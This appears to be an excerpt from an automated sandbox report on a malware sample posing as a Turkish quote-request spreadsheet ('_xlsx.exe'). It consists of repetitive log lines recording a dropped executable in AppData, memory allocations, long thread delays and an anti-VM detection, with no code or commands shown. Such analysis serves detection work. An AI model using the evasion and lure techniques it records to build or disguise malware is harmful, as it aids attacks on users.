Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 3340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 5340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 8030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 9030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 91E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: A1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 1030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 1290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 4B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 7300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 8300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 8490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 9490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 12B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 3000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Memory allocated: 2E40000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598341	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597248	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595280	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597294
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597185
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597074
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596967
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596827
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596345
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595662
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595216
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594997
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594452
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594344
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 594234

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6211	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7735	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Window / User API: threadDelayed 3461	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Window / User API: threadDelayed 6395	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Window / User API: threadDelayed 3586
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Window / User API: threadDelayed 6252

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
